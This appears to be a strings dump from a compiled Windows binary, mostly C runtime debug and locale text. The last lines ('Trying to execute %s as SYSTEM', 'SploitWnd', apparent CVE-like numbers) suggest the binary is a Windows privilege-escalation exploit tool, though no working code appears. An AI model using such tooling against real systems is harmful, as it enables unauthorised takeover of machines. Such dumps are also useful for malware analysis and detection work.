Program: %ls%ls%ls%ls%ls%ls%ls%ls%ls%ls%ls%ls
(Press Retry to debug the application)
minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp
common_message_window
traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character()))
Expression:
Line:
File:
Module:
wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error")
_CrtDbgReport: String too long or IO Error
minkernel\crts\ucrt\inc\corecrt_internal_strtox.h
base == 0 || (2 <= base && base <= 36)
__crt_strtox::parse_integer
c == '\0' || *_p == c
__crt_strtox::c_string_character_source<wchar_t>::unget
_p != nullptr
__crt_strtox::c_string_character_source<wchar_t>::validate
__crt_strtox::c_string_character_source<char>::unget
__crt_strtox::c_string_character_source<char>::validate
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
minkernel\crts\ucrt\src\appcrt\internal\winapi_thunks.cpp
minkernel\crts\ucrt\src\appcrt\stdio\_freebuf.cpp
_loc_update.GetLocaleT()->locinfo->_public._locale_mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->_public._locale_mb_cur_max == 2
minkernel\crts\ucrt\src\appcrt\convert\mbtowc.cpp
UTF-8 isn't supported in this _mbtowc_l function yet!!!
_loc_update.GetLocaleT()->locinfo->_public._locale_lc_codepage != CP_UTF8 && L"UTF-8 isn't supported in this _mbtowc_l function yet!!!"
_loc_update.GetLocaleT()->locinfo->_public._locale_mb_cur_max > 1
destination_count <= INT_MAX
minkernel\crts\ucrt\src\appcrt\convert\wctomb.cpp
_wctomb_s_l
destination_count > 0
minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp
fp_format_nan_or_infinity
strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit])
result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)
fp_format_e_internal
strcpy_s( p, result_buffer_count == (static_cast<size_t>(-1)) ? result_buffer_count : result_buffer_count - (p - result_buffer), "e+000")
result_buffer_count > static_cast<size_t>(1 + 4 + precision + 6)
fp_format_a
result_buffer != nullptr
__acrt_fp_format
result_buffer_count > 0
scratch_buffer != nullptr
scratch_buffer_count > 0
("Unsupported format specifier", 0)
stream.valid()
minkernel\crts\ucrt\src\appcrt\stdio\fileno.cpp
_fileno
minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
minkernel\crts\ucrt\src\appcrt\stdio\fwrite.cpp
_fwrite_nolock
buffer != nullptr
element_count <= (SIZE_MAX / element_size)
("Inconsistent Stream Count. Flush between consecutive read and write", stream->_cnt >= 0)
("Flush between consecutive read and write.", !stream.has_any_of(_IOREAD))
minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp
_commit
minkernel\crts\ucrt\src\appcrt\lowio\write.cpp
_write
!_dbcsBufferUsed(fh)
1 < mb_len && mb_buf_used < mb_len
mb_buf_used + bytes_to_add < mb_buf_size
available_bytes <= sizeof(_mbBuffer(fh))
isleadbyte(_dbcsBuffer(fh))
_write_nolock
buffer_size % 2 == 0
cached_state == static_cast<long>(policyValue)
minkernel\crts\ucrt\src\appcrt\internal\win_policies.cpp
name != nullptr
minkernel\crts\ucrt\src\desktopcrt\env\getenv.cpp
traits::tcsnlen(*current + name_length + 1, _MAX_ENV) < _MAX_ENV
buffer_pointer != nullptr
common_dupenv_s_nolock
traits::tcscpy_s(*buffer_pointer, value_count, value)
file_name != nullptr
minkernel\crts\ucrt\src\desktopcrt\exec\spawnv.cpp
common_spawnv
file_name[0] != '\0'
arguments != nullptr
arguments[0] != nullptr
arguments[0][0] != '\0'
traits::tcscpy_s(buffer.get(), file_name_size, dot_slash)
traits::tcscat_s(buffer.get(), file_name_size, file_name)
traits::tcscpy_s(buffer.get(), buffer_size, mutated_file_name)
traits::tcscpy_s(extension_buffer, 5, *it)
execute_command
mode >= 0 && mode <= _P_DETACH
minkernel\crts\ucrt\src\desktopcrt\exec\spawnvp.cpp
common_spawnvp
traits::tdupenv_s_crt(path_value.get_address_of(), nullptr, path_name)
traits::tcscat_s(file_buffer, 260, backslash_string)
traits::tcscat_s(file_buffer, 260, file_name)
path != nullptr
minkernel\crts\ucrt\src\appcrt\filesystem\waccess.cpp
_waccess_s
(access_mode & (~6)) == 0
hminkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp
common_expand_argv_wildcards
traits::tcsncpy_s( character_it, character_count - (character_it - character_first), *it, count)
copy_and_add_argument_to_buffer
traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length)
traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count)
equal_sign - option < _MAX_ENV
minkernel\crts\ucrt\src\desktopcrt\env\setenv.cpp
traits::tcsnlen(equal_sign + 1, _MAX_ENV) < _MAX_ENV
("CRT logic error in setenv", 0)
common_set_variable_in_environment_nolock
traits::tcscpy_s(name, count, option)
copy_environment
traits::tcscpy_s(*new_it, required_count, *old_it)
local_action != nullptr
minkernel\crts\ucrt\src\appcrt\misc\signal.cpp
("Invalid signal or error", 0)
("Invalid error_mode", 0)
minkernel\crts\ucrt\src\appcrt\misc\set_error_mode.cpp
_set_error_mode
common_tcscat_s
String is not null terminated
(L"String is not null terminated" && 0)
common_tcsncpy_s
static_cast<unsigned>(fh) < _NHANDLE_
minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp
__acrt_lowio_ensure_fh_exists
fh >= 0 && (unsigned)fh < (unsigned)_nhandle
_get_osfhandle
_osfile(fh) & FOPEN
((((( H
((((( H
(
c >= -1 && c <= 255
minkernel\crts\ucrt\src\appcrt\convert\isctype.cpp
("Corrupted pointer passed to _freea", 0)
VCCRT\vcruntime\inc\internal_shared.h
(ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[category].locale == nullptr && ptloci->lc_category[category].refcount == nullptr)
minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp
minkernel\crts\ucrt\src\appcrt\heap\expand.cpp
_expand_base
minkernel\crts\ucrt\src\appcrt\misc\dbgrptt.cpp
_VCrtDbgReportA
_itoa_s(nLine, szLineMessage, 4096, 10)
strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")
strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")
strcat_s(szLineMessage, 4096, szUserMessage)
strcat_s(szLineMessage, 4096, "\r")
strcat_s(szLineMessage, 4096, "\n")
strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
strcpy_s(szOutMessage, 4096, szLineMessage)
e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))
wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
_CrtDbgReport: String too long or Invalid characters in String
_VCrtDbgReportW
_itow_s(nLine, szLineMessage, 4096, 10)
Second Chance Assertion Failed: File
<file unknown>
, Line
wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
wcscpy_s(szLineMessage, 4096, szFormat ? L"Assertion failed: " : L"Assertion failed!")
Assertion failed:
Assertion failed!
wcscat_s(szLineMessage, 4096, szUserMessage)
wcscat_s(szLineMessage, 4096, L"\r")
wcscat_s(szLineMessage, 4096, L"\n")
%ls(%d) : %ls
wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
wcscpy_s(szOutMessage, 4096, szLineMessage)
wcstombs_s(nullptr, szOutMessage2, 4096, szOutMessage, ((size_t)-1))
strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")
wcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp
fclose
_fclose_nolock
minkernel\crts\ucrt\src\appcrt\convert\mbrtowc.cpp
retval != __crt_mbstring::INCOMPLETE
1 <= trail_bytes && trail_bytes <= 3
minkernel\crts\ucrt\src\appcrt\convert\c32rtomb.cpp
c32 < (1u << (7 - trail_bytes))
minkernel\crts\ucrt\src\appcrt\convert\_fptostr.cpp
__acrt_fp_strflt_to_string
buffer_count > 0
buffer_count > static_cast<size_t>((digits > 0 ? digits : 0) + 1)
pflt != nullptr
("Division by zero", false)
minkernel\crts\ucrt\inc\corecrt_internal_big_integer.h
minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp
__acrt_fltout
strcpy_s(result, result_count, "0")
strcpy_s(result, result_count, "1#INF" )
strcpy_s(result, result_count, "1#QNAN")
strcpy_s(result, result_count, "1#SNAN")
strcpy_s(result, result_count, "1#IND" )
mantissa_buffer_count > 0
("unexpected input value; log10 failed", 0)
quotient < digits_per_iteration_multiplier
minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp
("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)
minkernel\crts\ucrt\src\appcrt\lowio\isatty.cpp
_isatty
minkernel\crts\ucrt\src\appcrt\lowio\lseek.cpp
common_lseek
("Invalid file descriptor",0)
_string1 != nullptr
minkernel\crts\ucrt\src\appcrt\string\wcsnicol.cpp
_wcsnicoll_l
_string2 != nullptr
count <= INT_MAX
_wcsnicoll
minkernel\crts\ucrt\src\appcrt\string\strnicol.cpp
_strnicoll_l
minkernel\crts\ucrt\src\desktopcrt\exec\cenvarg.cpp
construct_command_line
traits::tcscpy_s(result_it, command_line_count - (result_it - command_line.get()), *source_it)
construct_environment_block
traits::tdupenv_s_crt(system_root_value.get_address_of(), nullptr, system_root_name)
traits::tcscpy_s(result_it, remaining_characters, *it)
traits::tcscpy_s(result_it, system_root_count, system_root_name)
traits::tcscat_s(result_it, system_root_count, equal_sign)
traits::tcscat_s(result_it, system_root_count, system_root_value.get())
base != nullptr || num == 0
minkernel\crts\ucrt\src\appcrt\stdlib\qsort.cpp
width > 0
comp != nullptr
minkernel\crts\ucrt\src\appcrt\convert\xtoa.cpp
common_xtox_s
buffer_count > static_cast<size_t>(is_negative ? 2 : 1)
2 <= radix && radix <= 36
length < buffer_count
common_xtox
lhs != nullptr
rhs != nullptr
s != nullptr
minkernel\crts\ucrt\src\appcrt\convert\mbstowcs.cpp
_mbstowcs_l_helper
(pwcs == nullptr && sizeInWords == 0) || (pwcs != nullptr && sizeInWords > 0)
_mbstowcs_s_l
retsize <= sizeInWords
minkernel\crts\ucrt\src\appcrt\lowio\close.cpp
_close
("Invalid input value", 0)
minkernel\crts\ucrt\src\appcrt\tran\contrlfp.c
_controlfp_s
minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp
CONOUT$
minkernel\crts\ucrt\src\appcrt\string\strnicmp.cpp
_strnicmp_l
_strnicmp
cchCount1==0 && cchCount2==1 || cchCount1==1 && cchCount2==0
minkernel\crts\ucrt\src\appcrt\locale\comparestringa.cpp
(mask&~(_MCW_DN|_MCW_EM|_MCW_RC))==0
minkernel\crts\ucrt\src\appcrt\tran\amd64\ieee.c
user32.dll
normalClass
magicClass
somewnd
[*] Trying to execute %s as SYSTEM
WinSta0\Default
hongye
unamer
SploitWnd
yntdll.dll
#32768
20211732
20201054
20191458
20190808